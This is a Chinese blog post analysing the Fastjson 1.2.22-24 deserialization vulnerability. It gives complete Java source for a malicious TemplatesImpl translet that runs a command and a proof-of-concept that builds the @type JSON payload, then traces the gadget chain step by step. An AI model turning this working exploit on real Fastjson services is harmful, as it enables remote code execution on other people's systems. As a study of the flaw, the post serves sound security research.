Fastjson 1.2.22-24 反序列化漏洞分析(1)

最新推荐文章于 2024-04-22 14:04:26 发布
最新推荐文章于 2024-04-22 14:04:26 发布
阅读量183 收藏
点赞数
分类专栏: JAVA安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45382656/article/details/119250269
版权

Fastjson 1.2.22-24 反序列化漏洞分析(1)

前言

FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。

影响版本:1.2.22-24
官方通告:https://github.com/alibaba/fastjson/wiki/security_update_20170315
补丁:https://github.com/alibaba/fastjson/commit/d075721cf396d5cb70e24c824b901e3a9a5b342b

漏洞分析

实验环境:jdk8u121

创建一个恶意类EvilPayload,继承AbstractTranslet

package com.yy.FastJson.payload01;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class EvilPayload extends AbstractTranslet {
    public EvilPayload() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public static void main(String[] args) throws IOException {
        EvilPayload t = new EvilPayload();
    }
}

新建一个Poc类

package com.yy.FastJson.payload01;

import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;

public class Poc {

    public static String readClass(String cls){
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }

        String result = Base64.encodeBase64String(bos.toByteArray());

        return result;
    }

    public static void bad_method() {
        ParserConfig config = new ParserConfig();
        String evil_path = "D:\\study\\java\\code\\vuln-master\\src\\main\\java\\com\\yy\\FastJson\\payload01\\EvilPayload.class";
        String evil_code = readClass(evil_path);

        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

        String json = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+evil_code+"\"]," +
                "'_name':'yang'," +
                "'_tfactory':{}," +
                "\"_outputProperties\":{}}\n";
        System.out.println(json);
        Object obj = JSON.parseObject(json,Feature.SupportNonPublicField);
    }

    public static void main(String args[]) {
        bad_method();
    }

}

上面生成的text1为:

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAAD...这里是EvilPayload.class的字节码文件转换成base64的字符串"],'_name':'yang','_tfactory':{ },"_outputProperties":{ }}

解析:

Poc类中的readClass方法,把class文件读取,然后进行base64编码变成字符串。

@type后面指定了反序列化的类为TemplatesImpl类,其类的属性

_bytecodes设置为恶意类
_name设置为yang
_tfactory设置为空
_outputProperties也为空

这个poc利用的就是parseObject或者parse

poc调试:

这个调用链的入口是getOutputProperties方法,其中的Getter方法满足加入fieldList[]列表的条件,所以无论是用parseObject还是parse都会调用get方法

image-20210729204904590

前面在fastjson中,会把evil_code进行base64解码后设置给_bytecodes

把断点下到newTransformer().getOutputProperties()

image-20210729205534853

跟进newTransformer()方法,其调用了getTransletInstance()方法

image-20210729210133195

跟进getTransletInstance()方法,其_class为null,所以会调用到defineTransletClasses()方法

image-20210729210254672

跟进defineTransletClasses()方法

image-20210729210832776

这个方法调用了defineClass()方法,可以从byte[]还原出一个Class对象,Class对象在调用newInstance()方法就会进行实例化

image-20210729211205337

回到getTransletInstance()方法中,进行了newInstance()实例化,然后就会调用其构造方法触发执行。

image-20210729211400438

注意点:

1)TemplatesImpl中_name的值不为null,才会调用到defineTransletClasses

image-20210621143307755

2)_bytecodes为null会报异常

image-20210729212115154

3)_tfactory会调用getExternalExtensionsMap()方法,如果为null会报错

image-20210729212259260

_tfactory是在fastjson中被赋值的

image-20210729212409199

图片来源:https://blog.csdn.net/qq_34101364/article/details/111706189

4)恶意类要继承AbstractTranslet类,因为这里会进行类型转换

image-20210619213119504

总结:

fastjson在反序列化过程中,会getOutputProperties()方法,最后调用到newInstance()方法就会进行实例化触发构造函数的执行。

无论通过fastjson哪种方式解析json字符串,都会触发getOutputProperties()方法,但要注意的是,前提是开发需要代码中写了Feature.SupportNonPublicField选项,导致了利用点更加的苛刻。

image-20210730095047151

参考:

https://www.anquanke.com/post/id/211035#h2-5

https://blog.csdn.net/qq_34101364/article/details/111706189

https://www.cnblogs.com/sijidou/p/13121332.html?ivk_sa=1024320u

洋洋cc
关注
专栏目录
Java安全攻防之从wsProxy到AbstractTranslet
tomato_bro的博客
08-23 1568
安全攻防
java反序列之Jdk7u21回显
m0_64354070的博客
12-06 2242
以前在打RMI反序列化的时候都是用的CC、CB利用链实现报错回显,很好使。 之前在做一次项目的时候发现了目标存在RMI反序列化漏洞,系统为Windows,无DNS不出网。 通过延时探测出只存在Jdk7u21利用链。 RMI回显 打目标时依然尝试使用老方法回显,Jdk7u21 + 报错回显,发现一直没回显。平时自己Jdk7u21利用链用得比较少,大概了解Jdk7u21最后的利用也是通过Templatesimpl#newTransformer方法实现代码执行,只能去看代码分析下失败的原因。 Jdk7u
Fastjson 1.2.22-24 反序列化漏洞分析
qq_50854662的博客
10-13 489
Fastjson 1.2.22-24 反序列化漏洞分析
Java反序列化-CC3链
最新发布
永远都没有了
04-22 622
CC3链笔记。CC3通过字节码文件,动态类加载来进行命令执行,达到绕过服务器的黑名单的一条链
spring回显方式在代码层面的复现(内存马系列篇十四)
阿道夫的博客
02-13 618
在前面的一章中,主要在理论上进行了各种内存马的实现,这里就做为上一篇的补充,自己搭建反序列化漏洞环境来进行上文中理论上内存马的注入实践。这是内存马系列文章的第十四篇。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking。
Fastjson 1.2.22-24 反序列化漏洞分析(2)
洋洋的小黑屋
08-02 435
Fastjson 1.2.22-24 反序列化漏洞分析(2) 1.环境搭建 我们以ubuntu作为被攻击的服务器,本机电脑作为攻击者 本机地址:192.168.202.1 ubuntu地址:192.168.202.129 JDK版本:jdk8u102 1.1 被攻击服务器 这里用ubuntu模拟被攻击的服务器 在ubuntu搭建一个springboot网站,用来模拟解析fastjson: pom.xml <parent> <groupId>org.springfram
fastjson1.2.24反序列化漏洞
weixin_45805993的博客
11-05 551
漏洞详情 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),并且无需进行任何身份验证。 如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX,并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的
什么是FastJson中AutoType反序列化漏洞?
热门推荐
hosaos的博客
06-30 1万+
文章目录频繁出现的反序列化漏洞parse()及parseObject()AutoType及安全校验AutoType安全校验AutoType黑名单机制SafeMode安全机制攻击思路反序列化攻击模拟TemplatesImpl攻击调用链路攻击类Translet生成构造攻击JSON串攻击模拟写在最后 频繁出现的反序列化漏洞 最近公司的小伙伴们收到了一波安全工单,因为FastJson存在高危漏洞,要求将FastJson版本号升级到1.2.69及以上 漏洞描述如下 在Fastjson<=1.2.68的版本中,
fastjson safemode_Fastjson 反序列化漏洞
weixin_33476081的博客
02-06 1445
作者:Longofo@知道创宇404实验室时间:2020年4月27日英文版本:https://paper.seebug.org/1193/Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一...
Fastjson 反序列化漏洞
晓得哥的博客
05-13 2177
作者:Longofo@知道创宇404实验室 时间:2020年4月27日 英文版本:https://paper.seebug.org/1193/ 原文地址:https://paper.seebug.org/1192/ Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce pa
[java安全]类加载器&CommonsCollections3
leekos的博客,分享web安全相关知识~
07-18 760
前面我们学习了等等cc链,这里我们学习第三条链子,这里需要用到类,由于这个类会使用到一些类加载器中相关的知识,所以我们需要先学习一些类加载器知识需要注意的是,类对加载的字节码是有要求的,这个字节码对应的类必须是类的子类所以我们构造一个特殊的类,继承类我们执行一下,得到结果:是一个可以加载字节码的类,通过调用方法,可以执行这段字节码的类构造方法。
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存马
bring_coco的博客
06-26 1752
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存马写了进去。接下来执行内存马,可以直接访问接口并输入命令,如下。
web渗透工程师——初级面试总结
m0_61506558的博客
10-12 2758
根据sql注入各自的特点可以分为联合注入、二次注入、宽字节注入、堆叠注入等,根据http报文中的不同位置可以有cookie注入、referer注入、x-forwarded-for注入等。产生sql注入漏洞主要因为没有对接受到的参数进行过滤、验证和处理直接拼接到了sql语句中,然后直接执行该sql语句,这样就会导致恶意用户传入一些精心构造的sql代码,与后台sql语句拼接后形成完整的sql语句执行,达到攻击者的目的。大小写绕过 、编码绕过、注释绕过、关键字/关键函数替换、参数污染、缓存区溢出、特殊符号。
fastjson复现
qq_42133828的博客
07-13 1914
fastjson2017-0315远程代码执行漏洞复现 漏洞名称: fastjson远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://github.com/alibaba/fastjson/wiki/security_update_20170315 公布时间: 2017-03-15 涉及应用版本: fastjson小于1.2.24的所有版本 poc适用于...
fastjson反序列化复现步骤
小白博客
12-16 4847
环境搭建 靶机 linux 攻击机 windows 恶意代码存放和rmi/ldap的服务机 linux 1.靶机环境搭建 需要搭建docker、docker-compose建议老版本(注意检验docker-compose的版本是否与本机的架构一致)、下载docker-compose到目录/usr/local/bin/后 执行权限分配 sudo chmod 777 docker-compose 然后运行 ln -s /usr/local/bin/docker-...
『Java安全』反序列化-Jdk7u21 POP链分析_ysoserial Jdk7u21 payload 分析_TemplateImpl触发反序列化漏洞
Ho1aAs‘s Blog
03-02 1273
文章目录前言原理分析TemplatseImpl.getOutputProperties()触发类加载动态代理AnnotationInvocationHandler.equal()调用getOutputProperties()ysoserial payload 分析代码审计完 前言 环境为Jdk<=7u21 +自带Xalan 原作者文章: Jdk7u21.java Java 7u21 Security Advisory 原理分析 TemplatseImpl.getOutputProperties()
利用Vulnhub复现漏洞 - Jackson-databind 反序列化漏洞(CVE-2017-7525)
JiangBuLiu的博客
07-10 8359
Jackson-databind 反序列化漏洞(CVE-2017-7525)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置CVE-2017-7525CVE-2017-17485 Vulnhub官方复现教程 https://vulhub.org/#/environments/jackson/CVE-2017-7525/ 漏洞原理 Jackson-da...
Java 反序列化漏洞--fastjson-1.2.24--TemplatesImpl攻击链
cjdgg的博客
02-24 1339
Java-fastjson-1.2.24反序列化漏洞前置知识漏洞分析getTransletInstance()newTransformer()getOutputProperties() 前置知识 fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 这里帮运一下素十八大佬总结的fastjson的功能要点 *1.使用 JSON.parse(jsonString)
利用Vulnhub复现漏洞 - Fastjson 反序列化导致任意命令执行漏洞
JiangBuLiu的博客
07-03 9132
Fastjson 反序列化导致任意命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境生成字节码本环境目录结构解压war漏洞复现生成字节码构造POC漏洞利用本地测试 Vulnhub官方复现教程 https://vulhub.org/#/environments/fastjson/vuln/ 漏洞原理 http://xxlegend.com/2017/04/29/title-%20fas...
fastjson1.2.83反序列化漏洞
08-18
对于fastjson 1.2.83版本的反序列化漏洞,它是一种远程代码执行漏洞,可导致攻击者执行任意代码。该漏洞存在于fastjson的TypeUtils类中,攻击者可以通过构造特定的JSON串来触发漏洞。具体来说,当JSON串中包含恶意类...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值